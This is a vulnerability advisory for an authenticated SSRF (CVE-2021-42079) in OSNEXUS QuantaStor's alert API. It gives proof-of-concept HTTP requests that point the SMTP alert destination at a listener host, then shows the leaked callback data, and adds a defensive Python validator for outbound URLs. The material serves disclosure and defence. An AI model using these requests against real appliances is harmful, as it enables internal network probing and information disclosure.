CVE-2021-42079
CVSS v3.1 severity:
MEDIUM
Type:
CWE-918
Server-Side Request Forgery (SSRF)
Publication date:
10/07/2023
Last modified:
22/09/2025
Description
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http:// HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic 
Content-Type: application/json
Content-Length: 0

Step 2: Trigger this alert with this request

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic 
Content-Type: application/json
Content-Length: 1

The POST request received by the listening host looks like this:

{
    ### Python FLASK stuff ####
    'endpoint': 'index',
    'method': 'POST',
    'cookies': ImmutableMultiDict([]),
    ### END Python FLASK stuff ####

    'data': b'{
        "attachments": [
            {
                "fallback": "[122] test / test.",
                "color": "#aa2222",
                "title": "[122] test",
                "text": "test",
                "fields": [
                    {
                        "title": "Alert Severity",
                        "value": "CRITICAL",
                        "short": false
                    }, {
                        "title": "Appliance",
                        "value": "quantastor (https://)",
                        "short": true
                    }, {
                        "title": "System / Driver / Kernel Ver",
                        "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
                        "short": false
                    }, {
                        "title": "System Startup",
                        "value": "Fri Aug 6 16-02-55 2021",
                        "short": true
                    }, {
                        "title": "SSID",
                        "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
                        "short": true
                    },
                ],
                "footer": "QuantaStor Call-home Alert",
                "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
                "ts": 1628461774
            }
        ],
        "mrkdwn":true
    }',

    #### FLASK REQUEST STUFF #####
    'headers': {
        'Host': '',
        'User-Agent': 'curl/7.58.0',
        'Accept': '*/*',
        'Content-Type': 'application/json',
        'Content-Length': '790'
    },
    'args': ImmutableMultiDict([]),
    'form': ImmutableMultiDict([]),
    'remote_addr': '217.103.63.173',
    'path': '/payload/58',
    'whois_ip': 'TNF-AS, NL'
}
#### END FLASK REQUEST STUFF #####
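The root cause above is that alert destinations (the slackWebhookUrl, mattermostWebhookUrl and smtpServerIpAddress parameters of alertConfigSet) are stored and later contacted without checking where they point. The following is an added defensive example, not OSNEXUS code: a validator for such outbound destinations that rejects the empty-host "http://" value seen in the PoC, non-HTTPS schemes, embedded credentials, and any host whose addresses are not globally routable. The policy and the injectable resolver are assumptions for illustration.

```python
"""Validate outbound alert destinations before storing them (added example,
not vendor code).  Policy (assumed): webhook URLs must be absolute https URLs
with a non-empty host, carry no credentials, and every address the host maps
to must be globally routable (no loopback, link-local, RFC 1918 or other
reserved space).  The resolver is injected so the check runs offline in tests."""
import ipaddress
import socket
from typing import Callable, Iterable, List, Optional
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]


def system_resolver(host: str) -> List[str]:
    """Return every A/AAAA address for host via the OS resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def host_is_public(host: str, resolve: Resolver = system_resolver) -> bool:
    """True only if *all* addresses for host are global.  Checking every
    record, not just the first, defends against answers that mix a public
    and an internal address.  Also suitable for an SMTP server field."""
    try:
        addrs = [ipaddress.ip_address(host)]        # IP literal, no lookup
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (socket.gaierror, ValueError):
            return False                            # unresolvable: reject
    return bool(addrs) and all(a.is_global for a in addrs)


def validate_webhook_url(url: str,
                         resolve: Resolver = system_resolver) -> Optional[str]:
    """Return None if url is an acceptable destination, else the reason."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return "scheme must be https"
    if not parts.hostname:                          # rejects bare 'https://'
        return "missing host"
    if parts.username or parts.password:
        return "credentials in URL not allowed"
    if not host_is_public(parts.hostname, resolve):
        return "host resolves to non-public address"
    return None


if __name__ == "__main__":
    # Constructed inputs: the PoC's empty host, a metadata-service address,
    # and a name that (via the fake resolver) maps to a public address.
    for candidate in ("http://", "https://169.254.169.254/latest",
                      "https://hooks.example.com/x"):
        print(candidate, "->", validate_webhook_url(
            candidate, resolve=lambda h: ["93.184.216.34"]))
```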
Impact
Base score 3.x
6.20
Severity 3.x
MEDIUM
Vulnerable products and versions
| CPE | From | To |
|---|---|---|
| cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:* | | 6.0.0.355 (excluding) |
References to solutions, tools and information
- https://cisrt.divd.nl/DIVD-2021-00020/
- https://csirt.divd.nl/CVE-2021-42079
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
- https://www.divd.nl/DIVD-2021-00020